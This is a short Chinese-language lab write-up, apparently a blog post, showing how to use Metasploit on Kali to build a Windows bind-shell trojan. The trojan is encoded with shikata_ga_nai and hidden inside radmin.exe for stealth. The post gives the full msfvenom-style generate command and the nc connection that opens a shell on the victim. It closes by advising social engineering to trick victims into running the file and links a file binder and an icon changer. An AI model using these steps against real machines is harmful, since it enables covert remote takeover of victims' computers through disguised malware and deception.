一,实验目的:
通过kali系统中的Meraspoloit Framework框架中的生成 payload已达到完全控制对方PC
二,实验环境:
Kali(2018版本)攻击者与win7被攻击者,两者可以相互通信
三,实验过程:
①在kali终端输入:msfconsole 进入此框架
②:使用框架中的payload模块
输入命令:
use payload/windows/shell_bind_tcp
show options查看详细信息(此时设置的是连接4444端口)
③输入坏字符生成命令:generate
④:生成程序:
generate -b ‘\x00\ff’ -t exe -e x86/shikata_ga_nai -i 5 -k -x /usr/share/windows-binaries/radmin.exe -f /root/1.exe
解释:
-t 指定我们要输出什么格式
-i 使用五轮
-k 是在运行 过程中不会产生新的进程,提升隐蔽性
-f 输出目标文件所在的路径
⑤:到目的路径找到生成的程序,并且使得目标机打开这个程序(因为现在是实验所以这里直接就拷贝过去了)
⑥:诱骗被攻击者打开我们的目标程序
四,进行实验验证
此时被攻击者的4444端口已经被打开了
成功:
kali 终端输入:nc 192.168.1.110 4444
复盘:
问:对方如何会打开我们的制作的木马?
答:我们可以使用社会工程学的知识来使对方打开我们的目标文件程序。
这里我们提供几个工具,工具一文件捆绑器:
https://pan.baidu.com/s/1jRW8Sy9H_lovD4ge-oglCQ
提取码:bjjq
工具二修改图标
链接:https://pan.baidu.com/s/1Jqofy92dJs2Eobup5aL4rA
提取码:f8nj
Comments NOTHING